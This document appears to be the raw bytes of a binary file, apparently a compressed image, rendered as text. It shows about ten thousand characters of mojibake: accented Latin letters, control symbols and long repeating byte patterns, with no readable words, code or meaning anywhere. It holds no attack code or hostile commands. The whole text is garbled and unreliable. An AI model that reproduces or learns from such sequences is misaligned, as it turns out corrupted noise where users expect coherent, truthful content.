          f7%Hö¨ÅæðõÑIK]G0Yé*¡’):‘ï÷¾ój½¸Ûïá1ÝDÔ`‘̐F ŽQÕÔ:š©èWö‹«uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝŽÅÿÓ9ÿ-©÷“܃³É6×ì?ñãÒI>6è×QÀ:Oú†ƒþµ'°¿ÚÉþ˜ÿ‡¥C€ê‘¾iÙCïú€Ú¿ûËâ}äW·ŸòªX§“þ®7E7Û·åþŠ·±·Iº÷¿uî½ïÝ{¯{÷^ëÞý׺§ÿœó:ãÿÃ7ÿ¹9_f6¦‘~}Q¸ôO=©Ôz×[`ô·üÉΦÿÄg±?÷–Å{Œ¯?Ü»¯ù¨ßñãÑkümöž„Ïiº¯^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×ÿÕÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¬3•0MO ¼sÅ$2꒡FìU½íIV8ƒ×¸gªÊ¯Šluun> Úzºš9…˜ZZYž	‰â·܈Œ²"H¿oFÀÔ8uίý
          îô{¯yÏõÿ¡½úƒÓ¯uï9þ¿ô7¿Pzuîƒìþ3%‡É˼öœ£ ñě›nÆË{®‚™4G=9‘’7N6jY˜ªÔF>Úfâ’Pzuî˜j÷–ß«Ý{OtŒ¥<{~‹`ïüEuG’œRHÙ݁D ª†P³Ó×C$uINê&IÔÆWXÓïÔëÝ9ÒQdwÕU6ksRϏÛ4“ÇW·ö…Z4uóBë-&vÀIýäuQãZéJm,áª4%7©×º<çúÿÐÞýAé׺÷œÿ_úߨ=:÷BG^övSbÖèõWàê¤
          _ŒgacšºbV
          µQÏö%ÍôVRëý¾+Ô¯Ã0àÈ}Gø<ºjX„ƒÑº<;{ra·N6,®²:ÊY},¦ji€éê¡>¸'Kò­õ"êA éí嶐Å2Q‡óùQÒVCFé÷Û=W¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uü{ùßûSdÿ÷
          wãO´uáÄu¨_¹G£NÏùŸ›_þÕ»Ÿÿyü‡¶n?²oËü=lqêè=–õ~½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{«³øEÿ2ÿkÝÏÿ»Y}㯸ßò´]Í(ÿ㣣{Oìí=`^”õï~ëÝ@ÊÓM[‹ÉQÓºÇ=]e4;2"M=<‘FîÈ®êªî	 Ð{vX§†GEpOØ
          OZ" Ž€?ôS¼ÿçs‹ÿώWÿ­Þş¿¶ßùF“ýå?è.˜ðŸÔuïôS¼ÿçs‹ÿώWÿ­Þýûûmÿ”i?ÞSþ‚ëÞúŽ…}‹·ò{oQC•©§«¨—#5ZIM5Dè°ÉMG
          ¡z˜`páàc`±ý}n·p^Ü$¶èUBÍIò'Ôtê)QBzhß»C7¹§ÆÉ‰®¤¤JHªqSSWv•âd()©ªo{[ڝ§pµ²I–â&bÄR€õ#­HŒÔ¡è?ÿE;Ïþw8¿üøåúÝìÛ÷öÛÿ(Ò¼§ýÓ~ú޽þŠwŸüîqùñÊÿõ»ß¿m¿ò'ûÊÐ]{ÂQ׿ÑNóÿÎ/ÿ>9_þ·{÷ïí·þQ¤ÿyOú¯xOê:÷ú)Þó¹ÅÿçÇ+ÿÖï~ýý¶ÿÊ4Ÿï)ÿAuï	ýGEÏv÷Pì]êÝy»;Û`á·tU)GYŽ›)¹'¦ÅÕ¹Qö¹¬Õ£ƒ¨Œ°ò%eL
          öÂû
          Ýû›Éß»®ï•/¡A
          }*§Ô3
          yõ.l^Á{ÅÌܸ9³bäKۍ…ºH4+H£ñCºÍ2ŸÂbÃ~õäßÍÙò® Åb÷.ۋ?‡­píZꬎNlm\¯I,PTO2oR–pVd
          ¢D¹PÀûµmüñ°-¥ž¨÷\Iº	¡†$+ƒÄBЊ‚&ûºû¾þÈsôÛ®ëc$ÛÜ&Úò4Ĩ¡Õ–TVÒ‘:УŒëPÄU›Cùf|«Ïîº|àÚ͓ƒkKwåw>ÙÉã)hăÉSEA‚ÌärÙ9ÞZ–Ã=–W„Ã,ý±æË‹µ·¸³X ¯tŒèʨ
          ŘӀ ô$uÒÿï“ì~ձ˹í[üۖåáÖ;X­î#‘ž˜Wy¢Ž(À8f.Ä
          ”Y(Ù®¶6¬öÏëì•°û7nâvíµMML8º8©MeQ@¨jë^3,¥@S#›8÷’{mŒ;e…žÝo_Õx¢•?3ÄüÏ\†æÞe¿ç.hßù¯tÒ7
          Æî[‡ð©‘ËhZçJk W¥Ÿµ½zfÏ`¨w:Lf@δò<r릗Å*I%IW­£+/ø\jm.¥³˜O
          5LŠŒÿ«Ë­2†=6퍟ŠÚiT¸é+fzÞJɒF"~5T†("P<‡:õöõöã=ùŒÌª֔¿i'­*­:UûAÕº÷¿uî½ïÝ{ +;Ö;'™Éäi²˜è ­­¨©†9*+–DŽYªºÇHè͉Å6»åœÐBð9uP	¢ù~}0Ñ1$צŸôGºçq‹ÿ܏ÿQ{Qýa±ÿ”i?bÿŸ­xMê:÷ú#Ý?ó¸ÅÿçVGÿ¨½ûúÃcÿ(Ò~Åÿ?^ð›ÔuïôGºçq‹ÿ܏ÿQ{÷õ†ÇþQ¤ý‹þ~½á7¨ëßètÿÎãÿYþ¢÷ïë
          ü£Iûüý{ÂoQ׿ÑéÿÆ/ÿ:²?ýEïßÖùF“ö/ùú÷„Þ£¯¢=Óÿ;Œ_þudú‹ß¿¬6?ò'ì_óõï	½G^ÿD{§þw¿üêÈÿõ¿XlåOØ¿çëÞzŽ•›3¯ó›w7J¿!CSN´Õ˜©ç¬’Bò¨
          BÍMXÏ7öƒrÝío-L1BÊú©Ëì'«¤l­Rz7N*§7ÈâèåŠ
          š´…b–f‘#CL31f‰$]##€y>Ê,gK[¸g‘IE& qàGŸW`YHzÿÑéÿÆ/ÿ:²?ýEìMýa±ÿ”i?bÿŸ¦|&õ{ýîŸùÜbÿó«#ÿÔ^ýýa±ÿ”i?bÿŸ¯xMê:÷ú#Ý?ó¸ÅÿçVGÿ¨½ûúÃcÿ(Ò~Åÿ?^ð›ÔuïôGºçq‹ÿ܏ÿQ{÷õ†ÇþQ¤ý‹þ~½á7¨ëßètÿÎãÿYþ¢÷ïë
          ü£Iûüý{ÂoQ׿ÑéÿÆ/ÿ:²?ýEïßÖùF“ö/ùú÷„Þ£¯¢=Óÿ;Œ_þudú‹ß¿¬6?ò'ì_óõï	½G^ÿD{§þw¿üêÈÿõ¿XlåOØ¿çëÞz޽þˆ÷Oüî1ùՑÿê/~þ°ØÿÊ4Ÿ±Ï×¼&õ{ýîŸùÜbÿó«#ÿÔ^ýýa±ÿ”i?bÿŸ¯xMê:
          »ß®w¾£û—;ŒËP¶KÕ=‡–Ç­=VDT5v;hæ+)ö‹iŒð®žGªÜûW·ï¶_ÙDmÜ™BÓ,¯Uxœ+ùuòÜ÷•õï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝZçò·þd{›à÷e&ØÝõùL·ÇÁËÒ®ÿÛеM\»;%7†‰;#kÐÅ®OâXêtEÈÒ·ÉÐÄKO
          + [™ùv-êØËc÷Œjtw:	>Gȟ„ü‰éøe1šØzßãgm?ô…µ6æúØûßj»°Øíöw&-WÄg0™jXë1Ù<ulE-]4ªêÀý67ñÚ}æÞÖim®,¥Iъ²•PA ŠñËCJOôGºçq‹ÿ܏ÿQ{kúÃcÿ(Ò~Åÿ?[ð›ÔuïôGºçq‹ÿ܏ÿQ{÷õ†ÇþQ¤ý‹þ~½á7¨è^Ùxݹ„\m}D5ª¢s-;Ë$z%Ñ¥uMOq§ž-ì=¹]Åyrf‰
          ¦(iåöW§QJ­Jßeý_¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è¤v/ü~™ÏùmKÿ¸žä›þI¶¿aÿ’Iñ·Fº‹þÒÔ4õ©=€¥þÖOôÇü=*TóKþÊxÿÔÕÿÞ_ï"½¼ÿ•RÃý<Ÿõqº)»þÝ¿/ðtU½ºM×½û¯uï~ëÝ{ߺ÷^÷î½Õ?|àÿ™×þ¸ýÉÊû0¶þÏóꧏD÷ڊ^«ÖØ=-ÿ2s©¿ñì?ýå±^ã;¿÷.ëþj7øOE¯ñ·Úz=§ê½{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷_ÿÖÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è€÷–à»%*&ŠläPf©Î“bõ!¡­»šúy¨?­ÈßgŸÆ±ŒW¹;OåÃùф
          ª1ê1Ð?æÿ[ý±öiŸŸOuï7úß폿gç׺÷›ýoöÇß³óëÝ{Íþ·ûcïÙùõîÅÚ;z«¸+²ÏD¯&7káóoHYÎ4ç²ù|½$9× ¿²¢—n‘ú£W·‘Ƽþ}{¡Íþ·ûcïyùõî½æÿ[ý±÷ìüú÷^ó­þØûö~}{¯y¿Öÿl}û?>½Ò£iïlæÌɦO	Wâs¥j©dôU𩿂®Ê$^N–:u`yöšêÖ¸Ìs-G‘ÅG̨è®(ãß×½—ƒì
          tŒ(³ñ†Èa¦4ð}ÏLÖO»¢g6
          ’…$\}·ÍbôaXõû}Ëöt‚Hš3Ÿ‡×¡Ú›ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uü{ùßûSdÿ÷
          wãO´uáÄu¨F±þ?ïñ_r‡w¯FO†Ì~íqÏü[w?þóùl\WÂjüºØãÕÑ{/êý{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷Wgð‹þdþ×»Ÿÿv²ûÇ_q¿åhºÿšQÿÇGFöŸØ/Úz7À½)ëÞý׺•J¹1y$ ,+ž‚±(Š:Æâ­©äå$vT¼ÄY‰Iöì1<&_샊ý•ÏòëF´4ãÐü¸¿ã¶Sÿ?˜Ïþ¸{}G.ï
          ÿ@ôÅ&ùþÞ½ü¸¿ã¶Sÿ?˜Ïþ¸{÷ÔrçðÇþðßô^¤ß?ÛЯ±i·-."¢=ÒÕ
          9žSWcý™¦£XÀ–žiÑSβzI¸76ä{ Ý^ÉîØàè #5>D*t껏Mö‹zÕύ;MêÖ$Š Výµ}-2ˆÃ¬TTÀd:CX‹Ûڝ¦M²4›ëÂê$RªO­xÖ¤i£ ÿø?qÇl§þ1Ÿýpömõ¹ü1ÿ¼7ýÓt›çûz÷ð~âÿŽÙOüþc?úáïßQ˟ÃûÃÐ=z“|ÿo^þÜ_ñÛ)ÿŸÌgÿ\=ûê9søcÿxoú¯RoŸíëßÁû‹þ;e?óùŒÿ뇿}G.ï
          ÿ@õêMóý½k!Ùûßlvvgfnmƒ½òûÊ»;Xb¨¤Áå3'vO[Y$«™Ä×QAWb¤’L‘;ìÊú]YFnÜ»¾ÚoV3ÙM-ٕ¨ÊŒDµcÞ¦™
          ÇÔV†„×~9/Ý_l÷¾GÚùiæmº×aŽÒ=HóÅ´€eV`bh©¢„@5)Rv讼mӽq´wÙEËíý©‹ÇUӍÁŒ”PxaýŒRÈ2LŒ¸ŠfJQ¤”´>’VÞó3“ Ûv¾VضýØ£n1[¨“µ5‡@¢Tœ:◼›þÑÍ~ésß1òÊiد7dˆÓNµ&†]&„xÌZ¿¸QѧØt»ª–йw[TµKÕ#RššÊzÆ€m/O<êƒÉø$jwY,$’#`FœÐšüÀê9@À\z^{*êý{ߺ÷L{‡‘Êbæ£ÅåeÃÕ»#-dJKiRKE­%ˆIþ­aoȸ*¬æ†	ÖIàF<ø}ØqÕX(
          M{GÂCT™¬üÙ£3F`IZiE.zÊÔT»Îþ]CÓ®ž>¾ßÜ.­n™
          µ ˆ4 ¯ä1Ž´ŠË]M^–˺¿^÷î½×½û¯tgp½¡6g'6.«"¸é+j‰cÍÓÁÓ4„ĬF‰Býob›[m YãO(ÕØN|óLôÃ,µ48ûziþÛßò¹”ÿЂ›ÿ«ý¨ú¾^ÿ}Çÿ8ÏýÖ´Ëêo^þÛßò¹”ÿЂ›ÿ«ýûêù{ý÷üã?ô^Ó/©ý½{øoÊæSÿB
          oþ¯÷ï«åï÷ÜóŒÿÐ={L¾§öõïà½ÿ+™Oý)¿ú¿ß¾¯—¿ßqÿÎ3ÿ@õí2úŸÛ׿€v÷ü®e?ô ¦ÿêÿ~ú¾^ÿ}Çÿ8Ïý×´Ëêo^þÛßò¹”ÿЂ›ÿ«ýûêù{ý÷üã?ô^Ó/©ý½{øoÊæSÿB
          oþ¯÷ï«åï÷ÜóŒÿÐ={L¾§öô¬Ù˜®Á£ÍÇ6㨮“)ª–£-
          d~fQâ&ª•‰èmÇ´•ÆÑ%©[4Q>¡ÁǞh:º	wpè@Ý0ejp90o*edHE#Ã:ÓHTÂÒiÞ5öC}X\qì¢ÅíÒîºÀ	­EGåöÓ«µJ<zÿ€v÷ü®e?ô ¦ÿêÿbo«åï÷ÜóŒÿÐ=3¦_Sûz÷ðÞÿ•̧þ„ßý_ïßWËßï¸ÿçÿ zö™}OíëßÀ;{þW2ŸúSõ¿}_/¾ãÿœgþëÚeõ?·¯íïù\ÊèAMÿÕþýõ|½þûþqŸú¯i—ÔþÞ½ü·¿ås)ÿ¡7ÿWû÷Õò÷ûî?ùÆè½¦_Sûz÷ðÞÿ•̧þ„ßý_ïßWËßï¸ÿçÿ zö™}OíëßÀ;{þW2ŸúSõ¿}_/¾ãÿœgþëÚeõ?·¯íïù\ÊèAMÿÕþýõ|½þûþqŸú¯i—ÔþÞ½ü·¿ås)ÿ¡7ÿWû÷Õò÷ûî?ùÆè½¦_Sûz÷ðÞÿ•̧þ„ßý_ïßWËßï¸ÿçÿ zö™}OíêKgöŽ__‰É>B³”¢ªÇWÒMŸ¦hj¨«`’šªšUûÿTsÁ++È>ì—Û2º" øgpü={L§ý½|Â>MôVèøËò·ºxÑÔÑçz»|æöÚ¥PùU=I¨Û™ØJ€²Qn=¹SI§px*Q€·¼¥Úw7m¶Ër¶pÐÍaöð#íV¨?1Ñ$ˆcvCÄ€¿fS¯{÷^ëÞý׺÷¿uî•;Kbïmý’þ±v~èޙm*çµ0]ÐÇJ»Qâi*ê	ãQ[{-Ý7­Ÿc·ú½ëu¶´µþ9¥H—ýéÙE>Œ¶½›wÞî>“fÚ®nÞVût¢±§åЫœø©ò_mcß-œèNÜÇãbŒËQ[&ÁܲÓÒÄ>²VÉ:U¢Œ~Z]ØfÏÜÏo7	Å­Ÿ;íopM‹˜cè °ÔÒס-ç¶¾ámð«ÎIÝÜ
          –6Ґ£ÕˆS¤¦§V‡ü«¿šÇc|SšŸãcoÜö?ãþäÌHpy2‹'Oî,Kµ]M™uPl¬å|ÆL”£©f¬‹Az±8#ÞnHÞ9‡—®·NM(œÃÔÀ"—¸‰FQƒ¦P(PŒ°R½°ÜyNÚ-cçki~ÐXÈHÒò ¦¸ø†
          …®¢
          )ÖÒño]ÉZðåàݹº¹*R:ª|¤YêùÞ¢9”KL5©Tí*JŒ]X†àûçßî‰;4··åI—pÀŽ ÔÔxõЈö^ke†-šÈٕQZ<(é¥8yt¶Ç÷_iã´ªo|ýTbß·_‘©­Õoë4ò5OûgÄ[w>ó6Û¤-òÍü3F’Wíf]±Ç@ÝÛÚo·}lûA1üP3CO±øµK|ȝ饿ˆÕe'ñ…2IC˜ÈA¦2Á†9å¨ÎÊ-¬\·±þÙï
          ªÓvå{i¥L=˜ó:\=sAMBµâ)Ô[¼}ÜlYÁØùšh­tY*x…Ôž©®ƒJp5¯K\g{Œƒ$snÜþ.G!@ÈU׬Zõž–J˜Qڜ¨þ¶ö:ÛýÐöþôq[9ò’Šý±ø‚Ÿ3O˨Óvö#Ü-·SZÛÁ{ó†P
          ?ÒËáü—Wʽ˜:Íå¹T6ßÞPænºŠc·®>ªd¹ÁM§…€ú†PG±u¦ÿÉ·â¶W6Òÿ¥ŸÌQùŽ£MӖùdb»¾Ïumž2FêØÄi?h$t¢þîvçü¯å?ô"ÿ«½®úÎ^ÿ}Gÿ8ÏýÑ6™}OíëßÝÎÜÿ•ü§þ„Qÿõw¿}g/¾£ÿœgþëÚeõ?·¯w;sþWòŸúGÿÕÞýõœ½þúþqŸú¯i—ÔþÞ¥ÐmþՎº‰ê«²mL•tïR­¸#‘L2ƒ ­:ÔÆ
          ōý·-ÞÂbGk*iúg1åÖÂËQRiöô`=„º¯{÷^ëÞý׺' ¾sôWÇ<ÒíMÕ[Ü»Å`†¦³klª
          ,žGTk5$™ªœ–OŠÇ=L,$X
          CUx™dñhtfs=ì<·?Ò]É$·´ÇT‹2¨¨Í+ª”4¡È/j¾ìþæû¹·óc¶µ³åòÅRæñÞ8åe4a
          DzȂ¥Âõºõ+¥øóó¥þKýýÀÊdñû—M÷Ù
          º¨©ñ[Ž,w‘!9*x©+rXܕsÈ©#ÒÔÌagO(O"jU˼ã²s7ˆ›|¬·H*czpÔ(YXW«b´¨©?»Àû‰ìçÒÜsM”2ì󾄻¶v–ÜÉB|6,‘ɐ	Q$i¬Ð[KPÑ{õ
          õï~ëÝ{ߺ÷E#±ãôÎËj_ýÀ¤÷ ìßòMµûüxô’Oº5Ô_ð“þ¡ ÿ­Iì/ö²¦?áéPà:¤oš_öPûÇþ 6¯þòøŸyíçüª–éäÿ«ÑMßöíùƒ¢­ìmÒn½ïÝ{¯{÷^ëÞý׺÷¿uî©ëç#»#·üñ¸ýÊË{_lóꧏDïS_÷íEUël~–ÿ™9ÔßøŒöþòدq¥ßû•sÿ5ü'¢×øÛí=	žÓõ^½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯ÿ×Ù_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^è³|šÛÿw¶q;–õM„È:¦éA•
          ÜþDUÐDªÐʯ³ý‚}ÀNj>ÑþÁ?³¥6ÍF+ëÑ!óÿ‡ûÇüoØ»óég^óÿ‡ûÇüoß¿>½ÐuSY>ÅÉÏ[4²Ï²s¯=kÌï+ìü½lÅå¬.ìÌ6ÆRªBÒÜڂ¡ËñNíà׳­ô"‰Áär ÏûϽþ}k¤Fo>õßU–¿Ûõ0W·ÐÐãësz/ÀÜ×ÿ½ë×=o§üæäÇmê/½È<Ÿ¹*RÑÒSDÕù*é¯öøümgËW[PTéEúYŠ¢³~}k¦Œ>~¢¶Møê$¤©ž©±ûbŽ©Ÿ„¢–Håo¾xœC˜ÏLb_,ä`ÅN4™%›ßŸ[é_çÿ÷øß½þ}k¯yÿÃýãþ7ïߟ^ëÞðÿxÿû÷ç׺rÄg²X&[U-BŠQ-=L&̌8ee$¤‘H¤«£®¤†=·,QÍE*‚‡ˆëDެW«;*‡±pqhés˜ñ9¬r·	#ã­¥Kš½$­É(À¡&Á˜
          ¸Ø=ŒÚxÂß	ÿ!ùöz/–3G¡CÙMõï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ3n/ø÷ó¿ö¦ÉÿîþïƟhëÈëP?r…GF_†Ÿó?v¿ý«7?þóõþظ#Â?o[zºoeý_¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^êìþ̀ÀÿÚ÷sÿîÖ_xëî7ü­_óJ?øèèÞÓûûOFãØ¥={ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯tǸeÎ˙öí=-NL2âªp¨c$ù=RCL£ô‡u_ë¡Uf¶­:‹ÇeƒÌõO°Wª¶ªvñé«hÔo	áª;²ŽŽ”©ìÌ
          žKëóy’žyáT[.“uo­ÁàûpM¹? ‘›kZ|©P¯ZMyÖ:Xû.êý{ߺ÷^÷î½ÐÎötœœ8Ê<‹ã¢­¨J'ñµ2ÈDE&4neRŸF¹¿±M­®ÆöÐ4ò ˜¨ÕßLùâ¸é†ijh1ötÓýãíÏùPÊè;ÿPûQô|½þýþrú­j—ÐþνýãíÏùPÊè;ÿPû÷Ñò÷ûö?ùÈè.½ª_Cû:÷÷·?åC)ÿ ìýCïßGËßïØÿç!ÿ ºö©}ìëßÞ>Üÿ•§þƒ±ÿõ¿}/¿cÿœ‡þ‚ëÚ¥ô?³¯xûsþT2ŸúÇÿÔ>ýô|½þýþrú¯j—ÐþνýãíÏùPÊè;ÿPû÷Ñò÷ûö?ùÈè.½ª_Cû:÷÷·?åC)ÿ ìýCïßGËßïØÿç!ÿ ºö©}ìéY³3[›Ž
          ÅK]4ÓT3=F(£ó*ƒ3­,D~‚üûA¹[íZ–³‘Lڇ®<ñSÕÐÈ[¸c¡tÔeip9Œ"K&R4„Ò$4âªFf©…dÓNRA%¡f?¤ØsøöQbIw
          ] $Ö¦ƒóûz»T)ÓÇ OûÇ۟ò¡”ÿÐv?þ¡ö&ú>^ÿ~Çÿ9ýÓ:¥ô?³¯xûsþT2ŸúÇÿÔ>ýô|½þýþrú¯j—ÐþνýãíÏùPÊè;ÿPû÷Ñò÷ûö?ùÈè.½ª_Cû:÷÷·?åC)ÿ ìýCïßGËßïØÿç!ÿ ºö©}ìëßÞ>Üÿ•§þƒ±ÿõ¿}/¿cÿœ‡þ‚ëÚ¥ô?³¯xûsþT2ŸúÇÿÔ>ýô|½þýþrú¯j—ÐþνýãíÏùPÊè;ÿPû÷Ñò÷ûö?ùÈè.½ª_Cû:÷÷·?åC)ÿ ìýCïßGËßïØÿç!ÿ ºö©}ìëßÞ>Üÿ•§þƒ±ÿõ¿}/¿cÿœ‡þ‚ëÚ¥ô?³¯xûsþT2ŸúÇÿÔ>ýô|½þýþrú¯j—ÐþνýãíÏùPÊè;ÿPû÷Ñò÷ûö?ùÈè.½ª_Cû:×sùß,¾ÊùG…ÿf·ª6Fc)ݝ{¶—¿vÆ+oMfl*ÏSK[ަ¢¤C’ÞÛ:	$Ç¥ª28ßòtf–š’	$žFæ}§e?¹å½ldz©.G<xœ+yùϙ=#¹†I?P)Ô>]iVARU"ÄÁAÜÝÑo]{÷^ëÞý׺=ÿ¾å>]ödôY)«q=e³f÷ÌQi޶¶JƘ㶾i#’(²9D¥•圫­%,O!Ú’÷ŸÝh}³Øa6q¤ÜËy©m£o…BÓ\ÒC¡*Z‚î@¡ÊÌ^Îû]'¸ûÔï}+ÃË6AZæEø˜µtC rPÕ¨B('â*o©èî°é}«A³úóg`öÖ‚4E¢H£še@WY,žJ¬žB]7’ªªIªen]É÷ÍÝó}Þ¹Ÿq›væÎ[½ÅÎ^F­ð¢ü(ƒÉ@uÐ
          §oÚùzÂ-§—6謶Äà‘
          ý'o‰Üù³Ç̓БࢪR±ÐRϺù^(’#‚!a³é?Ú/ôkƒìžŠx(#£=sÄAk†Wô©¯çœ}œ~]V¯ÎåÇ֟%6ÞctìÜN3ewM4ÕxÍËGN´”û†¦4gLfòŽøµm‚
          ÆY+¨Î–F’4zi&¿j½éæo/­¬ï.%»å`$·c©¢Sþ‰lXö2ñðê#“ …bbor½¦Ø=󸸊m9¸)1\¨Ð²°áÈQÞ€–ž$x ²‚ŒG–ïÎ
          ÏÓÀ|)ùLõ»v\&Xín»Ü–_FÓˉ*^¿ÏVÊí»o"dC„­ÐÃäHUޒZv§™}ìö·n潨{«íî‰ãš/á"ș)SqŒ‰W><thX"¸xsÚOq·VÝÛ.}W‚hdð ypb~<mêTT(&6B›{Ã.²Ç¬±¯@ÿvƒŠ©-úõT’ÍÏ܊…ž
          Ž4àOÈ˦¦ÄeÇîÀ© âõ"«ùõ‹Û};×$vFWFdt!•Еe`nXAèG½‚T‚
          ëLªÊU”# ð=øàìí·¡q;×8‘G`”ÕÕ#/HŠ?³&]+©£_ðUÏ,ù›°§Óî³iLu¯ì}@~C fíí×$oZÿ-Z™EðœüËÄQ‰ûIèOÇü§íPšù±µè…ȸÊJIY˜›+I@¥‘X‹Gøö6Û}оOï-¢Þá2¦H؟BC2ŒTá<º‹÷»×,\¸ýѺÝÚÈÕÃh™Ä)ç4²yô°¡ùS–žÂº¢¦Í®ÃŒ«€_\p$ÆßòÏØïn÷?’.h»†Ùulþµñö«ÿŒuîßw¾r´ÔÛ^ãgy¥Z'?íXÿª.1}é–Í:ōÝꉞÚ)ړOR÷ü%=M439ÿYO±Õ†÷íþäÒo6叓HÑ·û̅[ùun¼Ï{-NãË7kâʞ*µâÖ£öô»“¶ØZ™Rm؈ ò"†ÄìøYòñGOù©ÿCt&`H*A.»þñöçü¨e?ôÿ¨}ûèù{ýûüä?ôZÕ/¡ý{ûÇ۟ò¡”ÿÐv?þ¡÷ï£åï÷ìóÿÐ]{T¾‡öu«Gy¶ê~æí97ÂÖ¦ì“n©3«á©²fjÝ¿iÕ|tþ6_¨ˆth4ûÀŽgYט÷Õº¯Ž.察ãjPùŠSO•)LuôíIÙÛÛ/oÎÁ£÷?î{OM)§ÀJ֟U|J÷kÕ«º½
          r·ËN™þëýÏݍÃTÙCM¯HÛC’þòý֟H¦8_0:¸ÔVÞ­>Í9\žnÙ~–ºüCªŸÁ¥µ×妿ñ}þóçgÄû‡ûëGô‹áê§û‘âÇôú|õxÚ8f•ò¯[]{Ë.¸k×½û¯uï~ëÝŽÅÿÓ9ÿ-©÷“܃³É6×ì?ñãÒI>6è×QÀ:Oú†ƒþµ'°¿ÚÉþ˜ÿ‡¥C€ê‘¾iÙCïú€Ú¿ûËâ}äW·ŸòªX§“þ®7E7Û·åþŠ·±·Iº÷¿uî½ïÝ{¯{÷^ëÞý׺§ŸœŸó;#ÿÃ3ÿ¹Yok­Í#üú©ãÑ:ö£Që]m“Òßó':›ÿžÃÿÞ[î5ºÿr®æ£„ôXÿ}§¡3Ú~«×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ{ߺ÷^÷î½×½û¯uÿÐÙ_ÞDtëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^ëÞý׺÷¿uî½ïÝ{¯{÷^éØQ¸¶NèÃè×%f»í”‹ÿ–ÓÄj¨ߝ°FØ{Ue/wo-pWì8?ʽY—Sóê¨|ÿáþñÿ÷#~}õï?ø¼ÆýûóëÝc•¢ž) ž(æ†hÞ)¡–5’)b‘JI‘½Ñãt$Azüú÷Hu\»&¾›oÖÉ$›[!2Óm|”ìÒ6ªCh¶®FwbƙÏÉÜò?ɜëXLÚáŠã¯tیÜô؆Ý5b	²Y}ŽóáðÔz
          vR£	AŠÛO£[,tÔTƒ>â¦R°À‚ìnUO½s׺Ra0u)[ýâܓC‘Ü’Dñ@!q{z’k1¸(å
          àHn¢¢­‡«Db8cÝ<ϽÒÃÏþïñ¿{üú÷^óÿ‡ûÇüoß¿>½×¼ÿáþñÿ÷ïϯuï?ø¼ÆýûóëÝ{Ïþïñ¿~üú÷KM¾k¶&èÇî
          =oN ÉR!Ò+ñ“2ýÝ#]´ê*¡ã'…•¿Ò^Ú%å»Âüxƒè|ùþ]QÐ:•=Zv:¾“+AE“ ™j(²´õ´“§é–š¦%šôÕƒoǸõÑ£wÅMÚ:- ‚AãÔÏtëÝ{ߺ÷^÷î½×½û¯uï~ëÝ3n/ø÷ó¿ö¦ÉÿîþïƟhëÈëP/roF½o†Ÿó?¶¿ý«7?þóõþٟû3öõ±Ç«¦ö‡«uï~ëÝ{ߺ÷^÷î½×½û¯uï~ëÝ]ŸÂ/ùû^îýÚËï}Æÿ•¢ëþiGÿÚ`¿ièÜ{ô§¯{÷^êV­è1y*øÕ^J*
